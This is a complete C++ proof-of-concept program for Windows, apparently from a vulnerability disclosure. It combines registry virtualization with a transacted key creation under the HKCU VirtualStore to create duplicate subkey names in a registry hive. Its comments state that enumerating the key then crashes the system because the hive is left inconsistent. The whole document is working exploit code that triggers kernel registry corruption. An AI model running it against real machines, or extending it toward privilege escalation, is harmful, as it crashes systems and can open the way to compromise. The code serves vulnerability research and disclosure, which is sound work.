#include <Windows.h>
#include <ktmw32.h>
#include <sddl.h>

#include <cstdio>

#pragma comment(lib, "advapi32")
#pragma comment(lib, "ktmw32")

BOOL EnableTokenVirtualization(HANDLE hToken, BOOL bEnabled) {
  DWORD dwVirtualizationEnabled = bEnabled;
  if (!SetTokenInformation(hToken,
                           TokenVirtualizationEnabled,
                           &dwVirtualizationEnabled,
                           sizeof(dwVirtualizationEnabled))) {
    printf("SetTokenInformation failed with error %u\n", GetLastError());
    return FALSE;
  }

  return TRUE;
}

int main(int argc, char** argv) {
  LSTATUS st;

  //
  // Recursively delete the virtual store subtree to make sure we're starting
  // from a fresh state.
  //

  st = RegDeleteTreeA(HKEY_CURRENT_USER, "Software\\Classes\\VirtualStore");

  if (st != ERROR_SUCCESS && st != ERROR_FILE_NOT_FOUND) {
    printf("RegDeleteTreeA failed with error %d\n", st);
    return 1;
  }

  //
  // Create a test key in a world-writable location under HKLM\Software,
  // with a security descriptor allowing write access only to Administrators.
  //

  SECURITY_ATTRIBUTES sa;
  sa.nLength = sizeof(SECURITY_ATTRIBUTES);
  sa.bInheritHandle = FALSE;

  // Allow KEY_READ for World and KEY_ALL_ACCESS for Administrators.
  CONST WCHAR* szSD = L"D:(A;;KR;;;WD)(A;;KA;;;BA)";

  if (!ConvertStringSecurityDescriptorToSecurityDescriptorW(
          szSD, SDDL_REVISION_1, &sa.lpSecurityDescriptor, NULL)) {
    printf("ConvertStringSecurityDescriptorToSecurityDescriptorW failed with "
           "error %u\n", GetLastError());
    return 1;
  }

  HKEY hDrmTest;
  st = RegCreateKeyExA(HKEY_LOCAL_MACHINE,
                       "Software\\Microsoft\\DRM\\Test",
                       0,
                       NULL,
                       REG_OPTION_VOLATILE,
                       KEY_READ,
                       &sa,
                       &hDrmTest,
                       NULL);

  if (st != ERROR_SUCCESS) {
    printf("RegCreateKeyExA failed with error %d\n", st);
    return 1;
  }

  //
  // Create a transaction.
  //

  HANDLE hTrans = CreateTransaction(NULL, NULL, 0, 0, 0, 0, NULL);
  if (hTrans == INVALID_HANDLE_VALUE) {
    printf("CreateTransaction failed with error %u\n", GetLastError());
    return 1;
  }

  //
  // Create a transacted key in the virtual store.
  //

  HKEY hVirtualStoreRoot;
  st = RegCreateKeyExA(HKEY_CURRENT_USER,
                       "Software\\Classes\\VirtualStore\\Machine\\"
                       "Software\\Microsoft\\DRM",
                       0,
                       NULL,
                       REG_OPTION_VOLATILE,
                       KEY_ALL_ACCESS,
                       NULL,
                       &hVirtualStoreRoot,
                       NULL);

  if (st != ERROR_SUCCESS) {
    printf("RegCreateKeyExA failed with error %d\n", st);
    return 1;
  }

  HKEY hTransKey;
  st = RegCreateKeyTransactedA(hVirtualStoreRoot,
                               "Test",
                               0,
                               NULL,
                               REG_OPTION_VOLATILE,
                               KEY_ALL_ACCESS,
                               NULL,
                               &hTransKey,
                               NULL,
                               hTrans,
                               NULL);

  if (st != ERROR_SUCCESS) {
    printf("RegCreateKeyTransactedA failed with error %d\n", st);
    return 1;
  }

  //
  // Enable virtualization for our process.
  //

  HANDLE hToken;
  if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken)) {
    printf("OpenProcessToken failed with error %u\n", GetLastError());
    return 1;
  }

  EnableTokenVirtualization(hToken, TRUE);

  //
  // Create the same key in the virtual store through key replication.
  //

  HKEY hVirtualizedSubKey;
  st = RegCreateKeyExA(hDrmTest,
                       "SubKey",
                       0,
                       NULL,
                       REG_OPTION_VOLATILE,
                       KEY_ALL_ACCESS,
                       NULL,
                       &hVirtualizedSubKey,
                       NULL);

  if (st != ERROR_FILE_NOT_FOUND) {
    printf("RegCreateKeyExA failed with error %d "
           "(expected ERROR_FILE_NOT_FOUND)\n", st);
    return 1;
  }

  //
  // Commit the transaction, thus trying to persistently create a key with a
  // duplicate name.
  //

  if (!CommitTransaction(hTrans)) {
    printf("CommitTransaction failed with error %u\n", GetLastError());
    return 1;
  }

  //
  // Enumerate the key, triggering a crash due to the inconsistent hive state.
  // 

  printf("Subkeys:\n");

  for (DWORD i = 0;; i++) {
    CHAR KeyName[100];
    DWORD cchKeyName = sizeof(KeyName);

    st = RegEnumKeyExA(hVirtualStoreRoot, i, KeyName, &cchKeyName,
                       NULL, NULL, NULL, NULL);

    if (st == ERROR_NO_MORE_ITEMS) {
      break;
    }
    else if (st != ERROR_SUCCESS) {
      printf("RegEnumKeyExA failed with error %d\n", st);
      return 1;
    }

    printf("%d. %s\n", i + 1, KeyName);
  }

  RegCloseKey(hVirtualizedSubKey);
  RegCloseKey(hTransKey);
  RegCloseKey(hVirtualStoreRoot);
  RegCloseKey(hDrmTest);
  CloseHandle(hTrans);

  return 0;
}
